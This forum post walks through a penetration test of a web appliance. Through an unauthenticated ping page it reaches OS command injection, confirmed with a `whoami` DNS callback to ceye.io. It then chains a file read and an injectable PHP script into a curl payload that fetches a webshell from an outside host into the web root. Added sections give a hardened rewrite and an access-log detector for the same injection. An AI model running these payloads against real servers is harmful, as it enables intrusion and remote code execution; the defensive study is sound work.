China Network Penetration Testing Alliance

Title: Web security in practice: getting a webshell through an OS command injection vulnerability

Author: admin    Time: 2022-3-31 01:39
[md]**I. Finding a way in**

**Right-clicking to view the page source showed that the system's fingerprint is `images/select_bg.png`. Searching for it on ZoomEye gives the result shown below:**
![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**It turned out that both reporter and [Technology, Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all) use this fingerprint. I had worked on a system like this before and had its source code, so by comparing against the source tree I found an unauthenticated page.**

**The address is:**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**, as shown below:**
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**Testing the ping function on this page, I found that its normal behaviour can be bypassed to execute commands. The payload is:**

**`` `whoami`.1111.ceye.io ``, as shown below:**

![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The DNS records that came back are shown below:**

![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**This showed that the current user is root.**
**II. Getting a webshell by chaining vulnerabilities**

**This write-up follows the order in which the bugs were found. Next I ran the pwd command to get the web path, as shown below:**
![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**This revealed the site path: /var/www/html/view/systemconfig/systemtool/**

**Conveniently, while working in Burp Suite I found one OS command injection vulnerability and one arbitrary file read vulnerability. The screenshot below shows the arbitrary file read:**
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The OS command injection lives in /var/www/html/view/Behavior/toQuery.php. This path was obtained in the first step, through the command execution that bypasses the normal ping function. Using the arbitrary file read, we pull its source code:**

![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The source code is:**
```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>

<?php
session_start();

if ($_GET["objClass"] == "")
    exit();

// Every request parameter is forwarded as-is to the worker script.
$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET["method"] == "getList" || $_GET["method"] == "import" || $_GET["method"] == "processAlarm") {
    $param["user"] = $_SESSION["s_userName"];
    $param["lan"] = $_SESSION["lan"];
    $param["regUserpath"] = $_SESSION["regUserpath"];

    exec("rm -rf /tmp/cache");

    // The command line is built by string concatenation; objClass and method
    // come straight from the query string and are never validated or escaped.
    $cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
    $cmd .= " " . $_GET["objClass"];
    $cmd .= " " . $_GET["method"];
    $cmd .= " " . base64_encode(json_encode($param));

    file_put_contents("/tmp/query_cmd", $cmd);

    // Backgrounded with output discarded, so whatever is injected runs blind.
    exec($cmd . " > /dev/null &");
} else {
    require_once($_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");

    $obj = new QueryInterface();
    $instance = $obj->getInstance();
    $instance->invokeMethod($_GET["objClass"], $_GET["method"], $param);
}

exit();
?>
```
**A quick audit shows `if ($_GET["method"] == "getList" || $_GET["method"] == "import" || $_GET["method"] == "processAlarm")`: as long as method is one of getList, import or processAlarm, `$cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";`, i.e. cmd is the absolute web path plus system/behavior/behavior_query.php. Then `file_put_contents("/tmp/query_cmd", $cmd);` and `exec($cmd . " > /dev/null &");`. The user-controlled objClass appended to $cmd hands us a command injection parameter, which is a direct OS command injection vulnerability. Here is my demonstration:**
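As an added example (not the vendor's code and not from the write-up), this is how the command-building branch above can be hardened: allowlist objClass and method, then pass every argument through escapeshellarg(). The same validate-then-escape idea is applied to the ping host parameter from section I. The contents of ALLOWED_CLASSES, the function names and the CLI demo are assumptions.

```php
<?php
// Added example, not the vendor's or the write-up author's code: a hardened
// replacement for the command-building branch of toQuery.php, plus the same
// validate-then-escape idea applied to the ping host from section I.
// ALLOWED_CLASSES contents, the function names and the CLI demo are assumptions.

declare(strict_types=1);

// Only these values may be passed to the external PHP worker. The class
// names are placeholders; the real ones come from behavior_query.php.
const ALLOWED_CLASSES = ['Behavior', 'Alarm'];                  // assumed
const ALLOWED_METHODS = ['getList', 'import', 'processAlarm'];  // from the original source

/**
 * Build the worker command line, or throw if objClass/method is not allowlisted.
 * Every argument still goes through escapeshellarg() so that a future allowlist
 * mistake cannot turn into shell syntax.
 */
function buildQueryCommand(string $objClass, string $method, array $param, string $docRoot): string
{
    if (!in_array($objClass, ALLOWED_CLASSES, true)) {
        throw new InvalidArgumentException('objClass not allowed');
    }
    if (!in_array($method, ALLOWED_METHODS, true)) {
        throw new InvalidArgumentException('method not allowed');
    }
    $script  = rtrim($docRoot, '/') . '/system/behavior/behavior_query.php';
    $payload = base64_encode(json_encode($param, JSON_THROW_ON_ERROR));
    return '/usr/local/php/bin/php '
        . escapeshellarg($script) . ' '
        . escapeshellarg($objClass) . ' '
        . escapeshellarg($method) . ' '
        . escapeshellarg($payload);
}

/**
 * Accept only an IP literal or an RFC 1123 hostname for the ping feature,
 * so input like `whoami`.1111.ceye.io never reaches a shell.
 */
function isSafePingTarget(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($host) <= 253
        && preg_match('/^(?:' . $label . '\.)*' . $label . '$/i', $host) === 1;
}

// Demonstration on constructed input: php hardened_toquery.php
if (PHP_SAPI === 'cli') {
    $docRoot = '/var/www/html/';
    echo buildQueryCommand('Behavior', 'getList', ['user' => 'alice'], $docRoot), "\n";

    // The objClass value from the write-up is refused by the allowlist
    // before any command line is built.
    try {
        buildQueryCommand('|curl http://1.1.1.1/x -o /var/www/html/images/suiji2.php', 'getList', [], $docRoot);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }

    var_dump(isSafePingTarget('example.com'));
    var_dump(isSafePingTarget('`whoami`.1111.ceye.io'));
}
```

Two things in the original that the allowlist alone does not fix: `$param = $_REQUEST` lets the caller pre-fill any key before the session values are merged in, and writing the full command line to `/tmp/query_cmd` leaves the base64-encoded session data on disk for any local user who can read that file. On PHP 7.4 and later, handing `proc_open()` an argument array instead of a string avoids the shell entirely, which is the stronger fix.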
![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**In the screenshot, objClass= is where the OS command injection is. I first tried a bash reverse shell, but after a whole night of testing it never connected back, so in the end I chose to download the webshell with curl. The payload is:**

```text
%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php
```
**URL-decoded, it reads:**

```text
|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php
```

**All those pipe characters are there to close off the payload. In the end curl downloaded the webshell successfully, as shown below:**
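On the detection side, here is an added example (not from the write-up) that scans web-server access-log lines for requests carrying shell metacharacters in the parameters toQuery.php hands to exec(), and in the ping host parameter. The log lines are constructed; the ping script name and its `host` parameter are assumptions, since the write-up only shows a truncated URL for that page.

```php
<?php
// Added example, not from the write-up: flag access-log requests whose
// objClass/method (toQuery.php) or ping host parameter contain characters
// that change shell parsing. Sample log lines below are constructed; the
// ping script path and the "host" parameter name are assumptions.

declare(strict_types=1);

// Parameters that end up inside an exec() string in the code shown above.
const WATCHED_PARAMS = ['objClass', 'method', 'host'];

// Any of these inside a watched parameter is a shell-syntax attempt, not a
// legitimate class, method or host name.
const SHELL_META = '/[|;&`$<>\\\\\n\r\'"(){}]/';

/**
 * Return one finding per log line whose watched parameter contains shell
 * metacharacters. Each finding: ['ip' => ..., 'param' => ..., 'value' => ...].
 */
function findCommandInjectionAttempts(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        // Combined log format: client IP first, request line as the first quoted field.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)/', $line, $m)) {
            continue;
        }
        [, $ip, $uri] = $m;
        $query = parse_url($uri, PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        parse_str($query, $params);  // also URL-decodes the values
        foreach (WATCHED_PARAMS as $name) {
            if (isset($params[$name]) && is_string($params[$name])
                && preg_match(SHELL_META, $params[$name]) === 1) {
                $findings[] = ['ip' => $ip, 'param' => $name, 'value' => $params[$name]];
            }
        }
    }
    return $findings;
}

// Constructed sample lines: a benign call, one carrying the start of the curl
// payload from the write-up (URL-encoded as it appears in a log), and a ping probe.
$sampleLog = [
    '10.0.0.5 - - [31/Mar/2022:01:38:00 +0800] "GET /view/Behavior/toQuery.php?objClass=Behavior&method=getList HTTP/1.1" 200 12',
    '10.0.0.9 - - [31/Mar/2022:01:38:42 +0800] "GET /view/Behavior/toQuery.php?objClass=%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php&method=getList HTTP/1.1" 200 12',
    '10.0.0.9 - - [31/Mar/2022:01:35:59 +0800] "GET /view/systemConfig/systemtool/ping.php?host=%60whoami%60.1111.ceye.io HTTP/1.1" 200 300',
];

if (PHP_SAPI === 'cli') {
    foreach (findCommandInjectionAttempts($sampleLog) as $f) {
        printf("%s  %s=%s\n", $f['ip'], $f['param'], $f['value']);
    }
}
```

Because toQuery.php discards the command output (`> /dev/null &`), a successful injection returns a normal-looking 200, so the evidence lives in the request log and in outbound traffic from the web server (the DNS lookup to ceye.io in section I, the curl fetch here), not in the HTTP response.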
![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**III. Summary**

**That this case ended with a webshell depended largely on a combination of several vulnerabilities. First, viewing the page source identified which system the target runs, since I had tested a similar program before. Then, "prescribing the right medicine", I found the unauthenticated ping page and, by bypassing the normal ping behaviour, ran pwd to obtain the site's absolute path. Next, I used the arbitrary file read to fetch the PHP file suspected of OS command execution and audited it briefly, which confirmed the vulnerability. Finally I built the OS command execution payload and got the webshell. The whole process is a chain of vulnerabilities; penetration testing often comes down to luck, and if any one link in this chain had been absent or gone unfound, getting the webshell might have failed.**

**In short, luck and bug-hunting skill matter equally. Thanks for reading!**
[/md]

Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2